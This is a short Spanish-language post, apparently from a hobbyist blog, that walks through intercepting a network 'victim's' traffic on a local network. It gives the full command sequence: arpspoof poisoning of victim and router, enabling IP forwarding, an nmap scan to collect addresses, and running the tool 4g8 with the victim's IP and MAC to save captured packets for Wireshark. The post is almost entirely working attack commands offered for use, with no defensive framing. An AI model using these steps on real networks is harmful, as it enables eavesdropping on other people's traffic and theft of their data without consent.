Hoy en el local hemos estado trasteando con una pequeña y bastante desconocida aplicación llamada 4g8 que realiza, de forma muy simple, captura de paquetes a una victima de nuestra red.
Previamente preparar el equipo para el envenenamiento arp, lanzando en dos terminales distintas y sin cerrarlas:
# arpspoof -i eth0 -t 192.168.1.12 192.168.1.1
# arpspoof -i eth0 -t 192.168.1.1 192.168.1.12
El “12” la victima, el “1” el router y el -i … la red. El paquete que contiene arpspoof es dsniff (apt-get .....). En otra terminal, activar forwarding para que los paquetes vayan a su verdadero dueño:
# echo 1 > /proc/sys/net/ipv4/ip_forward
Para conocer los parámetros (ips y MACs) que luego tendremos que especificar cuando lancemos la aplicación 4g8 hacer un scaner de la red:
# nmap 192.168.1.0/24
Y anotamos la ip y la Mac de la victima y del router y con los datos lLanzar 4g8:
# 4g8 -i eth0 -g 192.168.1.1 -G 64:69:0C:87:A8:DC -s 192.168.1.12 -S 00:19:01:54:F5:1F -w dump.pcap
-g (la ip del router)
-G (la MAC del router)
-s (la ip de la victima)
-S (la MAC de la victima)
-w (el archivo donde guardar las capturas)
Para el análisis del archivo dump.pcap abrirlo con wireshark. Felices capturas.
